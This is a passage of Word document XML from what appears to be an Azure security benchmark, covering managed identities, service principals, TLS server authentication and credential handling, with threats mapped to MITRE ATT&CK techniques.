        <w:t>Implement managed identities using the following steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1637E60A" w14:textId="1BA792DC" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Choose and enable managed identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31991CEC" w14:textId="37BF8284" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Assign least privilege permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7169C314" w14:textId="75A5AD43" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use Azure Role-Based Access Control (RBAC) to grant the managed identity specific roles (e.g., Key Vault Secrets User or Storage Blob Data Reader) for target Azure services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAD8B9C" w14:textId="5C6E9057" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate authentication in application code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A75AE8" w14:textId="2EFD1C56" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Use Azure SDKs (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Azure.Identity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> in .NET, azure-identity in Python) with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DefaultAzureCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> to authenticate to services like Key Vault, SQL Database, or Storage without embedding credentials. For example, in C#, use var credential = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DefaultAzureCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>); to fetch a token for accessing a secret from Key Vault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA1D50" w14:textId="77777777" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00EC686A"/>
    <w:p w14:paraId="7F78FE30" w14:textId="63ECD155" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Enable automatic token refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75692811" w14:textId="15695007" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t xml:space="preserve">Ensure your application handles </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC686A">
        <w:t>token refresh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC686A">
        <w:t xml:space="preserve"> automatically (tokens typically expire after 24 hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2CB610" w14:textId="048673A7" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="00E71790">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IM-3.2: Use service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>principals</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where managed identities are not applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300DCC47" w14:textId="55AC17DC" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Implement service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>principals</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> using the following approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B8FA8" w14:textId="5BE32C2F" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Create service principal in Microsoft Entra ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0670F2D8" w14:textId="5974B27E" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure restricted permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251519B6" w14:textId="1BD50029" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use certificate-based credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71178F72" w14:textId="5C442BBB" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Fallback </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> client secrets if necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94DCD5" w14:textId="41672393" w:rsidR="00EF5293" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">If certificates are not feasible, create a client secret in Entra ID with a defined expiration (e.g., 1 year). Securely store the secret in Azure Key Vault and retrieve it programmatically, avoiding </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>hard-coding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> in source code or configuration files. Rotate secrets before expiration and delete unused secrets to minimize risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59F787" w14:textId="309067F4" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate authentication in application code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A83376" w14:textId="460D715D" w:rsidR="00E71790" w:rsidRPr="00E53977" w:rsidRDefault="00E71790" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Use Azure SDKs (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>ClientCertificateCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>ClientSecretCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Azure.Identity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>)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4" w:name="_Toc242449487"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-4: Authenticate server and services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="1FD12C63" w14:textId="2CBAFF24" w:rsidR="00A66B07" w:rsidRDefault="00A66B07" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F1BF4" w14:textId="604A6E18" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Authenticate remote servers and services from your client side to ensure you are connecting to trusted server and services. The most common server authentication protocol is Transport Layer Security (TLS), where the client-side (often a browser or client device) verifies the server by verifying the server's certificate was issued by a trusted certificate authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C333019" w14:textId="7A7B20AC" w:rsidR="00A66B07" w:rsidRPr="00E53977" w:rsidRDefault="00A66B07" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2849BE01" w14:textId="19742F36" w:rsidR="00A66B07" w:rsidRPr="00E53977" w:rsidRDefault="00A66B07" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770C181" w14:textId="76742E4A" w:rsidR="00A66B07" w:rsidRPr="00E53977" w:rsidRDefault="00A66B07" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Theft or Leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFFDF8D" w14:textId="21007456" w:rsidR="00A66B07" w:rsidRPr="00E53977" w:rsidRDefault="00A66B07" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Man-in-the-Middle (MITM) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F30A78" w14:textId="05BA586C" w:rsidR="00A66B07" w:rsidRPr="00E53977" w:rsidRDefault="00A66B07" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A9DA5" w14:textId="1E515B6D" w:rsidR="00A66B07" w:rsidRPr="00E53977" w:rsidRDefault="00A66B07" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Overly permissive identities or misconfigured scopes allow attackers to access unauthorized resources or execute privileged actions. A service principal with excessive RBAC roles (e.g., "Owner") could deploy malicious resources, while a client with broad user permission might alter critical configurations, escalating from limited to full control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE2D7C3" w14:textId="6CAE86F8" w:rsidR="00D40BE6" w:rsidRPr="00E53977" w:rsidRDefault="00D40BE6" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B4D0C" w14:textId="4F0034D1" w:rsidR="00D40BE6" w:rsidRDefault="00D40BE6" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B14785" w14:textId="0AB87C73" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Attackers exploit weak authentication in service-to-service or client-to-service flows, using stolen client credentials (T1078.004) or phishing for user tokens (T1566.002) to infiltrate environments. For example, a misconfigured OAuth 2.0 app registration allows unauthorized API access (T1133) via forged tokens, granting entry to storage or compute resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B114AA" w14:textId="26E636A7" w:rsidR="00D40BE6" w:rsidRDefault="00D40BE6" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A73C6F1" w14:textId="4616EFAA" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Adversaries target exposed client secrets, certificates, or JWTs in code repositories, logs, or unsecured vaults (T1552.001). Techniques include scraping service principal credentials from CI/CD pipelines (T1552.004) or intercepting refresh tokens during client authentication (T1539), enabling persistent access to protected APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9B0B0" w14:textId="00F24E42" w:rsidR="00D40BE6" w:rsidRDefault="00D40BE6" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F8DA7E" w14:textId="5C3ED6F5" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:lastRenderedPageBreak/>
        <w:t>Attackers harvest authentication artifacts like access tokens or session data from compromised resources (T1213.002). This includes extracting hardcoded secrets from application configs (T1552.001) or capturing in-transit tokens via MITM on unsecured service-to-service calls (T1040), fueling further attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13212D62" w14:textId="44DBB804" w:rsidR="00D40BE6" w:rsidRDefault="00D40BE6" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DDF0E2" w14:textId="0FA1463B" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t xml:space="preserve">Compromised service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC686A">
        <w:t>principals</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC686A">
        <w:t xml:space="preserve"> or user accounts with excessive role-based permissions are abused to gain elevated access (T1078.004). Attackers exploit misconfigured app permissions (T1548.004) to modify resource configurations or assign admin roles, escalating control over systems or tenants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118CA0B" w14:textId="4EE81C62" w:rsidR="00D40BE6" w:rsidRDefault="00D40BE6" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E7890" w14:textId="7BADE4FC" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Attackers forge stolen tokens (T1606.002) to mimic legitimate traffic or manipulate claims to bypass API validation (T1036.008). Disabling audit logging (T1562.001) or using managed identities to blend with normal operations (T1078) helps evade detection by monitoring systems.</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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement server and service authentication through the following practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D09A75" w14:textId="53779EEB" w:rsidR="00D40BE6" w:rsidRPr="00E53977" w:rsidRDefault="00D40BE6" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable TLS authentication for all services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0663E16A" w14:textId="54820778" w:rsidR="00D40BE6" w:rsidRPr="00E53977" w:rsidRDefault="00D40BE6" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Verify certificate trust in client applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53411EF6" w14:textId="28F709A3" w:rsidR="00D40BE6" w:rsidRPr="00E53977" w:rsidRDefault="00D40BE6" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement mutual TLS where applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336038DE" w14:textId="2BDBD9DE" w:rsidR="00835088" w:rsidRPr="00E53977" w:rsidRDefault="00835088" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Services such as API Management and API Gateway support TLS mutual authentication for enhanced security where both server and client authenticate one another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF27B45" w14:textId="0AACAE44" w:rsidR="00835088" w:rsidRPr="00E53977" w:rsidRDefault="00835088" w:rsidP="00835088">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc242449488"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-8: Restrict the exposure of credentials and secrets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="0907BFB9" w14:textId="78E673AF" w:rsidR="00835088" w:rsidRPr="00E53977" w:rsidRDefault="00835088" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0A513" w14:textId="0B6213B4" w:rsidR="00835088" w:rsidRPr="00E53977" w:rsidRDefault="00835088" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Ensure that application developers securely handle credentials and secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F06BA79" w14:textId="77777777" w:rsidR="00835088" w:rsidRPr="00E53977" w:rsidRDefault="00835088" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Avoid embedding the credentials and secrets into the code and configuration files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CA9E5" w14:textId="77777777" w:rsidR="00835088" w:rsidRPr="00E53977" w:rsidRDefault="00835088" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
